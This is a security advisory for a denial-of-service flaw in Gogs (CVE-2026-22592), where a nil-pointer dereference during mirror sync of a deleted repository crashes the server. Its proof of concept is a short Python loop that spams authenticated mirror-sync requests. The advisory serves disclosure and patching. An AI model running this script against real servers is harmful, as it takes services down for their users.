Gogs has a Denial of Service issue

基本資訊

• GHSA ID: GHSA-cr88-6mqm-4g57
• CVE ID: CVE-2026-22592
• 嚴重性: MEDIUM
• 發布時間: 2026-02-06T18:08:16Z
• 來源: GitHub Advisory

漏洞描述

Summary

An authenticated user can cause a DOS attack. If one of the repo files is deleted before synchronization, it will cause the application to crash.

Details

If GetMirrorByRepoID fails, the error log dereferencing null pointer. This happens if the repository no longer exits. https://github.com/gogs/gogs/blob/4cc83c498b6ae59356a04912d68a932165bad5e6/internal/database/mirror.go#L333-L337 if err != nil m is alwasa nil https://github.com/gogs/gogs/blob/4cc83c498b6ae59356a04912d68a932165bad5e6/internal/database/mirror.go#L269-L278

PoC

Spam mirror-sync on repo and delete this repo code python spam mirror-sync

import requests

url = "http://gogs.lan:3000/superuser/gobypass403/settings"
headers = {
    "Cookie": "lang=en-US; i_like_gogs=fe32281ab84ae868; _csrf=UCw6xvqR-L7YLBMPjujwjywxy8s6MTc2NDc3NDQ2NDE1MzU5ODQ3Mg",
}

data = {
    "_csrf": "UCw6xvqR-L7YLBMPjujwjywxy8s6MTc2NDc3NDQ2NDE1MzU5ODQ3Mg",
    "action": "mirror-sync",
}

while True:
    print("syncing")
    response = requests.post(url, headers=headers, data=data)

Impact

Denial of Service server crash.

影響範圍

• go:gogs.io/gogs (<= 0.13.3) → 0.13.4

CVSS 評分

• CVSS v3: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

CWE 分類

• CWE-862: Missing Authorization

EPSS 評分

• EPSS: N/A

萃取備註

• 資料來源: GitHub Security Advisories Database
• 信心水準: 高(官方漏洞資料庫)
• 處理時間: 2026-02-08T07:48:03.061025